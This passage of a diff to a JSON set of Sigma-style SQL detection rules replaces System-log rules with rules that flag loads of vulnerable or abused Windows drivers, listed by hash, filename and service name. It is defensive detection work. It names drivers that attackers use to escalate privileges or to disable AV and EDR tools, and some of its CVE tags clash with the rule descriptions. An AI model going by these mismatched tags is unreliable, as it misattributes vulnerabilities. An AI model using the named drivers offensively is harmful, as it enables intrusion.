'%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9'))" ], - "filename": "win_system_susp_dhcp_config.yml" + "filename": "driver_load_win_windivert.yml" }, { - "title": "Windows Pcap Drivers", - "id": "7b687634-ab20-11ea-bb37-0242ac130002", - "status": "test", - "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", - "author": "Cian Heasley", + "title": "Vulnerable Lenovo Driver Load", + "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "status": "experimental", + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate driver loads (old driver that didn't receive an update)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '4697' AND (ServiceFileName LIKE '%pcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npf%' ESCAPE '\\' OR ServiceFileName LIKE '%nm3%' ESCAPE '\\' OR ServiceFileName LIKE '%ndiscap%' ESCAPE '\\' OR ServiceFileName LIKE '%nmnt%' ESCAPE '\\' OR ServiceFileName LIKE '%windivert%' ESCAPE '\\' OR ServiceFileName LIKE '%USBPcap%' ESCAPE '\\' OR ServiceFileName LIKE '%pktmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f')" ], - "filename": "win_system_pcap_drivers.yml" + "filename": "driver_load_win_vuln_lenovo_driver.yml" }, { - "title": "Moriya Rootkit - System", - "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "title": "Vulnerable AVAST Anti Rootkit Driver Load", + "id": "7c676970-af4f-43c8-80af-ec9b49952852", "status": "experimental", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", "attack.privilege_escalation", "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" + "SELECT * FROM logs WHERE (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired')))" ], - "filename": "win_system_moriya_rootkit.yml" + "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" }, { - "title": "Turla Service Install", - "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", - "status": "test", - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "title": "Process Hacker and System Informer Driver Load", + "id": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "status": "experimental", + "description": "Detects the load of drivers used by Process Hacker and System Informer", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate user of process hacker or system informer by low level developers or system administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemInformer.sys' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=821D74031D3F625BCBD0DF08B70F1E77%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F86759BB4DE4320918615DC06E998A39%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0%' ESCAPE '\\') OR Imphash IN ('821D74031D3F625BCBD0DF08B70F1E77', 'F86759BB4DE4320918615DC06E998A39', '0A64EEB85419257D0CE32BD5D55C3A18', '6E7B34DFC017700B1517B230DF6FF0D0') OR (Hashes LIKE '%SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB%' ESCAPE '\\' OR Hashes LIKE '%SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97%' ESCAPE '\\' OR Hashes LIKE '%SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138%' ESCAPE '\\') OR sha256 IN ('8b9ad98944ac9886ea4cb07700e71b78be4a2740934bb7e46ca3b56a7c59ad24', 'a41348bec147ca4d9ea2869817527eb5cea2e20202af599d2b30625433bcf454', '38ee0a88af8535a11efe8d8da9c6812aa07067b75a64d99705a742589bdd846d', 'a773891acf203a7eb0c0d30942fb1347648f1cd918ae2bfd9a4857b4dcf5081b', '4c3b81ac88a987bbdf7d41fa0aecc2cedf5b9bd2f45e7a21f376d05345fc211d', '3241bc14bec51ce6a691b9a3562e5c1d52e9d057d27a3d67fd0b245c350b6d34', '047c42e9bba28366868847c7dafc1e043fb038c796422d37220493517d68ee89', '18931dc81e95d0020466fa091e16869dbe824e543a4c2c8fe644fa71a0f44feb', 'b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b', '640954afc268565f7daa6e6f81a8ee05311e33e34332b501a3c3fe5b22adea97', '251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656', 'e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4', '3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138'))" ], - "filename": "win_system_apt_carbonpaper_turla.yml" + "filename": "driver_load_win_process_hacker.yml" }, { - "title": "Potential RDP Exploit CVE-2019-0708", - "id": "aaa5b30d-f418-420b-83a0-299cb6024885", - "status": "test", - "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", - "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", + "title": "Vulnerable Driver Load", + "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "status": "experimental", + "description": "Detects the load of known vulnerable drivers by hash value", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ - "Bad connections or network interruptions" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('56', '50') AND Provider_Name = 'TermDD')" + "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=1b5c3c458e31bede55145d0644e88d75%' ESCAPE '\\' OR Hashes LIKE '%MD5=6f5d54ab483659ac78672440422ae3f1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=c02f70960fa934b8defa16a03d7f6556%' ESCAPE '\\' OR Hashes LIKE '%MD5=839cbbc86453960e9eb6db814b776a40%' ESCAPE '\\' OR Hashes LIKE '%MD5=acac842a46f3501fe407b1db1b247a0b%' ESCAPE '\\' OR Hashes LIKE '%MD5=95e4c7b0384da89dce8ea6f31c3613d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=e700a820f117f65e813b216fccbf78c9%' ESCAPE '\\' OR Hashes LIKE '%MD5=96b463b6fa426ae42c414177af550ba2%' ESCAPE '\\' OR Hashes LIKE '%MD5=27bcbeec8a466178a6057b64bef66512%' ESCAPE '\\' OR Hashes LIKE '%MD5=70dcd07d38017b43f710061f37cb4a91%' ESCAPE '\\' OR Hashes LIKE '%MD5=db72def618cbc3c5f9aa82f091b54250%' ESCAPE '\\' OR Hashes LIKE '%MD5=83601bbe5563d92c1fdb4e960d84dc77%' ESCAPE '\\' OR Hashes LIKE '%MD5=5970e8de1b337ca665114511b9d10806%' ESCAPE '\\' OR Hashes LIKE '%MD5=49fe3d1f3d5c2e50a0df0f6e8436d778%' ESCAPE '\\' OR Hashes LIKE '%MD5=1493d342e7a36553c56b2adea150949e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f191abc652d8f7442ca2636725e1ed6%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ae30291c6cbfa7be39320badd6e8de0%' ESCAPE '\\' OR Hashes LIKE '%MD5=d104621c93213942b7b43d65b5d8d33e%' ESCAPE '\\' OR Hashes LIKE '%MD5=b89b097b8b8aecb8341d05136f334ebb%' ESCAPE '\\' OR Hashes LIKE '%MD5=14580bd59c55185115fd3abe73b016a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=992ded5b623be3c228f32edb4ca3f2d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=a26e600652c33dd054731b4693bf5b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f950cfd5ed8dd9de3de004f5416fe20%' ESCAPE '\\' OR Hashes LIKE '%MD5=491aec2249ad8e2020f9f9b559ab68a8%' ESCAPE '\\' OR Hashes LIKE '%MD5=e4266262a77fffdea2584283f6c4f51d%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd25be845c151370ff177509d95d5add%' ESCAPE '\\' OR Hashes LIKE '%MD5=9638f265b1ddd5da6ecdf5c0619dcbe6%' ESCAPE '\\' OR Hashes LIKE '%MD5=4e90cd77509738d30d3181a4d0880bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=0a6a1c9a7f80a2a5dcced5c4c0473765%' ESCAPE '\\' OR Hashes LIKE '%MD5=9aa7ed7809eec0d8bc6c545a1d18107a%' ESCAPE '\\' OR Hashes LIKE '%MD5=aa1ed3917928f04d97d8a217fe9b5cb1%' ESCAPE '\\' OR Hashes LIKE '%MD5=42f7cc4be348c3efd98b0f1233cf2d69%' ESCAPE '\\' OR Hashes LIKE '%MD5=4cc3ddd5ae268d9a154a426af2c23ef9%' ESCAPE '\\' OR Hashes LIKE '%MD5=2fed983ec44d1e7cffb0d516407746f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7cbbb5eb263ec9a35a1042f52e82ca4%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed6348707f177629739df73b97ba1b6e%' ESCAPE '\\' OR Hashes LIKE '%MD5=40bc58b7615d00eb55ad9ba700c340c1%' ESCAPE '\\' OR Hashes LIKE '%MD5=c3fea895fe95ea7a57d9f4d7abed5e71%' ESCAPE '\\' OR Hashes LIKE '%MD5=2128e6c044ee86f822d952a261af0b48%' ESCAPE '\\' OR Hashes LIKE '%MD5=3dbf69f935ea48571ea6b0f5a2878896%' ESCAPE '\\' OR Hashes LIKE '%MD5=c6f8983dd3d75640c072a8459b8fa55a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=79f7e6f98a5d3ab6601622be4471027f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bae1f127c4ff21d8fe45e2bbfc59c180%' ESCAPE '\\' OR Hashes LIKE '%MD5=c533d6d64b474ffc3169a0e0fc0a701a%' ESCAPE '\\' OR Hashes LIKE '%MD5=3f39f013168428c8e505a7b9e6cba8a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=748cf64b95ca83abc35762ad2c25458f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bce7f34912ff59a3926216b206deb09f%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d8e4f38b36c334d0a32a7324832501d%' ESCAPE '\\' OR Hashes LIKE '%MD5=47e6ac52431ca47da17248d80bf71389%' ESCAPE '\\' OR Hashes LIKE '%MD5=3651a6990fe38711ebb285143f867a43%' ESCAPE '\\' OR Hashes LIKE '%MD5=dc943bf367ae77016ae399df8e71d38a%' ESCAPE '\\' OR Hashes LIKE '%MD5=02198692732722681f246c1b33f7a9d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=ddc2ffe0ab3fcd48db898ab13c38d88d%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ec361f2fba49c73260af351c39ff9cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1fce7aac4e9dd7a730997e2979fa1e2%' ESCAPE '\\' OR Hashes LIKE '%MD5=49938383844ceec33dba794fb751c9a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=34069a15ae3aa0e879cd0d81708e4bcc%' ESCAPE '\\' OR Hashes LIKE '%MD5=1c294146fc77565030603878fd0106f9%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd81af62964f5dd5eb4a828543a33dcf%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd5b0514f3b40f139d8079138d01b5f6%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa173832dca1b1faeba095e5c82a1559%' ESCAPE '\\' OR Hashes LIKE '%MD5=5cc5c26fc99175997d84fe95c61ab2c2%' ESCAPE '\\' OR Hashes LIKE '%MD5=1ed043249c21ab201edccb37f1d40af9%' ESCAPE '\\' OR Hashes LIKE '%MD5=361a598d8bb92c13b18abb7cac850b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b359b722ac80c4e0a5235264e1e0156%' ESCAPE '\\' OR Hashes LIKE '%MD5=296bde4d0ed32c6069eb90c502187d0d%' ESCAPE '\\' OR Hashes LIKE '%MD5=d3e40644a91327da2b1a7241606fe559%' ESCAPE '\\' OR Hashes LIKE '%MD5=12cecc3c14160f32b21279c1a36b8338%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd39a86852b498b891672ffbcd071c03%' ESCAPE '\\' OR Hashes LIKE '%MD5=b2a9ac0600b12ec9819e049d7a6a0b75%' ESCAPE '\\' OR Hashes LIKE '%MD5=444f538daa9f7b340cfd43974ed43690%' ESCAPE '\\' OR Hashes LIKE '%MD5=7b43dfd84de5e81162ebcfafb764b769%' ESCAPE '\\' OR Hashes LIKE '%MD5=13dda15ef67eb265869fc371c72d6ef0%' ESCAPE '\\' OR Hashes LIKE '%MD5=300c5b1795c9b6cc1bc4d7d55c7bbe85%' ESCAPE '\\' OR Hashes LIKE '%MD5=1392b92179b07b672720763d9b1028a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=2e1f8a2a80221deb93496a861693c565%' ESCAPE '\\' OR Hashes LIKE '%MD5=8065a7659562005127673ac52898675f%' ESCAPE '\\' OR Hashes LIKE '%MD5=b5ada7fd226d20ec6634fc24768f9e22%' ESCAPE '\\' OR Hashes LIKE '%MD5=84fb76ee319073e77fb364bbbbff5461%' ESCAPE '\\' OR Hashes LIKE '%MD5=daf800da15b33bf1a84ee7afc59f0656%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7393fb917aed182e4cbef25ce8af950%' ESCAPE '\\' OR Hashes LIKE '%MD5=120b5bbb9d2eb35ff4f62d79507ea63a%' ESCAPE '\\' OR Hashes LIKE '%MD5=73c98438ac64a68e88b7b0afd11ba140%' ESCAPE '\\' OR Hashes LIKE '%MD5=51207adb8dab983332d6b22c29fe8129%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a23e0f2c6f926a41b28d574cbc6ac30%' ESCAPE '\\' OR Hashes LIKE '%MD5=20125794b807116617d43f02b616e092%' ESCAPE '\\' OR Hashes LIKE '%MD5=e8ebba56ea799e1e62748c59e1a4c586%' ESCAPE '\\' OR Hashes LIKE '%MD5=8abbb12e61045984eda19e2dc77b235e%' ESCAPE '\\' OR Hashes LIKE '%MD5=f66b96aa7ae430b56289409241645099%' ESCAPE '\\' OR Hashes LIKE '%MD5=97e3a44ec4ae58c8cc38eefc613e950e%' ESCAPE '\\' OR Hashes LIKE '%MD5=ff7b31fa6e9ab923bce8af31d1be5bb2%' ESCAPE '\\' OR Hashes LIKE '%MD5=12908c285b9d68ee1f39186110df0f1e%' ESCAPE '\\' OR Hashes LIKE '%MD5=6126065af2fc2639473d12ee3c0c198e%' ESCAPE '\\' OR Hashes LIKE '%MD5=356bda2bf0f6899a2c08b2da3ec69f13%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd7de498a72b2daf89f321d23948c3c4%' ESCAPE '\\' OR Hashes LIKE '%MD5=338a98e1c27bc76f09331fcd7ae413a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=c9a293762319d73c8ee84bcaaf81b7b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=e9e786bdba458b8b4f9e93d034f73d00%' ESCAPE '\\' OR Hashes LIKE '%MD5=a17c58c0582ee560c72f60764ed63224%' ESCAPE '\\' OR Hashes LIKE '%MD5=21e13f2cb269defeae5e1d09887d47bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=a57b47489febc552515778dd0fd1e51c%' ESCAPE '\\' OR Hashes LIKE '%MD5=d6e9f6c67d9b3d790d592557a7d57c3c%' ESCAPE '\\' OR Hashes LIKE '%MD5=76bb1a4332666222a8e3e1339e267179%' ESCAPE '\\' OR Hashes LIKE '%MD5=1cd158a64f3d886357535382a6fdad75%' ESCAPE '\\' OR Hashes LIKE '%MD5=d9e7e5bcc5b01915dbcef7762a7fc329%' ESCAPE '\\' OR Hashes LIKE '%MD5=d253c19194a18030296ae62a10821640%' ESCAPE '\\' OR Hashes LIKE '%MD5=b12d1630fd50b2a21fd91e45d522ba3a%' ESCAPE '\\' OR Hashes LIKE '%MD5=50b39072d0ee9af5ef4824eca34be6e3%' ESCAPE '\\' OR Hashes LIKE '%MD5=778b7feea3c750d44745d3bf294bd4ce%' ESCAPE '\\' OR Hashes LIKE '%MD5=0761c357aed5f591142edaefdf0c89c8%' ESCAPE '\\' OR Hashes LIKE '%MD5=23cf3da010497eb2bf39a5c5a57e437c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c49a1956a6a25ffc25ad97d6762b0989%' ESCAPE '\\' OR Hashes LIKE '%MD5=f406c5536bcf9bacbeb7ce8a3c383bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=f2f728d2f69765f5dfda913d407783d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b817d0e7714b9d43db43ae4a22a161e%' ESCAPE '\\' OR Hashes LIKE '%MD5=715f8efab1d1c660e4188055c4b28eed%' ESCAPE '\\' OR Hashes LIKE '%MD5=a01c412699b6f21645b2885c2bae4454%' ESCAPE '\\' OR Hashes LIKE '%MD5=010c0e5ac584e3ab97a2daf84cf436f5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d5db81974ffda566fa821400419f59be%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014ba35d406475311a2eab0c4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d487f77be4471900d6ccbc47242cc25%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f2888e57fdd6aee466962c25ba7d62d%' ESCAPE '\\' OR Hashes LIKE '%MD5=507a649eb585d8d0447eab0532ef0c73%' ESCAPE '\\' OR Hashes LIKE '%MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11%' ESCAPE '\\' OR Hashes LIKE '%MD5=cd9f0fcecf1664facb3671c0130dc8bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=b10b210c5944965d0dc85e70a0b19a42%' ESCAPE '\\' OR Hashes LIKE '%MD5=ae5eb2759305402821aeddc52ba9a6d6%' ESCAPE '\\' OR Hashes LIKE '%MD5=f5051c756035ef5de9c4c48bacb0612b%' ESCAPE '\\' OR Hashes LIKE '%MD5=1898ceda3247213c084f43637ef163b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=37086ae5244442ba552803984a11d6cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=825703c494e0d270f797f1ecf070f698%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\' OR Hashes LIKE '%MD5=75d6c3469347de1cdfa3b1b9f1544208%' ESCAPE '\\' OR Hashes LIKE '%MD5=9ab9f3b75a2eb87fafb1b7361be9dfb3%' ESCAPE '\\' OR Hashes LIKE '%MD5=5f9785e7535f8f602cb294a54962c9e7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7d46d0ddaf8c7e1776a70c220bf47524%' ESCAPE '\\' OR Hashes LIKE '%MD5=f9844524fb0009e5b784c21c7bad4220%' ESCAPE '\\' OR Hashes LIKE '%MD5=828bb9cb1dd449cd65a29b18ec46055f%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d17b32be70ef39eae5d5edeb5e89877%' ESCAPE '\\' OR Hashes LIKE '%MD5=2391fb461b061d0e5fccb050d4af7941%' ESCAPE '\\' OR Hashes LIKE '%MD5=6d4159694e1754f262e326b52a3b305a%' ESCAPE '\\' OR Hashes LIKE '%MD5=a60c9173563b940203cf4ad38ccf2082%' ESCAPE '\\' OR Hashes LIKE '%MD5=63e333d64a8716e1ae59f914cb686ae8%' ESCAPE '\\' OR Hashes LIKE '%MD5=a9f220b1507a3c9a327a99995ff99c82%' ESCAPE '\\' OR Hashes LIKE '%MD5=c5f5d109f11aadebae94c77b27cb026f%' ESCAPE '\\' OR Hashes LIKE '%MD5=5bab40019419a2713298a5c9173e5d30%' ESCAPE '\\' OR Hashes LIKE '%MD5=c996d7971c49252c582171d9380360f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=98763a3dee3cf03de334f00f95fc071a%' ESCAPE '\\' OR Hashes LIKE '%MD5=e79c91c27df3eaf82fb7bd1280172517%' ESCAPE '\\' OR Hashes LIKE '%MD5=a42249a046182aaaf3a7a7db98bfa69d%' ESCAPE '\\' OR Hashes LIKE '%MD5=803a371a78d528a44ef8777f67443b16%' ESCAPE '\\' OR Hashes LIKE '%MD5=9007c94c9d91ccff8d7f5d4cdddcc403%' ESCAPE '\\' OR Hashes LIKE '%MD5=11fb599312cb1cf43ca5e879ed6fb71e%' ESCAPE '\\' OR Hashes LIKE '%MD5=7f9309f5e4defec132b622fadbcad511%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=8636fe3724f2bcba9399daffd6ef3c7e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9dfd73dadb2f1c7e9c9d2542981aaa63%' ESCAPE '\\' OR Hashes LIKE '%MD5=490b1f404c4f31f4538b36736c990136%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1d063c9422a19944cdaa6714623f2ec%' ESCAPE '\\' OR Hashes LIKE '%MD5=dacb62578b3ea191ea37486d15f4f83c%' ESCAPE '\\' OR Hashes LIKE '%MD5=2da209dde8188076a9579bd256dc90d0%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ba6afe0ea182236f98365bd977adfdf%' ESCAPE '\\' OR Hashes LIKE '%MD5=4c016fd76ed5c05e84ca8cab77993961%' ESCAPE '\\' OR Hashes LIKE '%MD5=ad22a7b010de6f9c6f39c350a471a440%' ESCAPE '\\' OR Hashes LIKE '%MD5=79483cb29a0c428e1362ec8642109eee%' ESCAPE '\\' OR Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%MD5=ccf523b951afaa0147f22e2a7aae4976%' ESCAPE '\\' OR Hashes LIKE '%MD5=736c4b85ce346ddf3b49b1e3abb4e72a%' ESCAPE '\\' OR Hashes LIKE '%MD5=b0baac4d6cbac384a633c71858b35a2e%' ESCAPE '\\' OR Hashes LIKE '%MD5=798de15f187c1f013095bbbeb6fb6197%' ESCAPE '\\' OR Hashes LIKE '%MD5=a86150f2e29b35369afa2cafd7aa9764%' ESCAPE '\\' OR Hashes LIKE '%MD5=b941c8364308990ee4cc6eadf7214e0f%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd04cd3de0c19bede84e9c95a86b3ca8%' ESCAPE '\\' OR Hashes LIKE '%MD5=6909b5e86e00b4033fedfca1775b0e33%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b91a44a488e4d539f2e55476b216024%' ESCAPE '\\' OR Hashes LIKE '%MD5=8b287636041792f640f92e77e560725e%' ESCAPE '\\' OR Hashes LIKE '%MD5=07f83829e7429e60298440cd1e601a6a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0395b4e0eb21693590ad1cfdf7044b8b%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b058945c9f2b8d8ebc485add1101ba5%' ESCAPE '\\' OR Hashes LIKE '%MD5=0067c788e1cb174f008c325ebde56c22%' ESCAPE '\\' OR Hashes LIKE '%MD5=c2c1b8c00b99e913d992a870ed478a24%' ESCAPE '\\' OR Hashes LIKE '%MD5=84ba7af6ada1b3ea5efb9871a0613fc6%' ESCAPE '\\' OR Hashes LIKE '%MD5=dbc415304403be25ac83047c170b0ec2%' ESCAPE '\\' OR Hashes LIKE '%MD5=31469f1313871690e8dc2e8ee4799b22%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d465b4487dc81effaa84f122b71c24f%' ESCAPE '\\' OR Hashes LIKE '%MD5=64efbffaa153b0d53dc1bccda4279299%' ESCAPE '\\' OR Hashes LIKE '%MD5=b164daf106566f444dfb280d743bc2f7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7c72a7e1d42b0790773efd8700e24952%' ESCAPE '\\' OR Hashes LIKE '%MD5=56a515173b211832e20fbc64e5a0447c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c2eb4539a4f6ab6edd01bdc191619975%' ESCAPE '\\' OR Hashes LIKE '%MD5=d1bac75205c389d6d5d6418f0457c29b%' ESCAPE '\\' OR Hashes LIKE 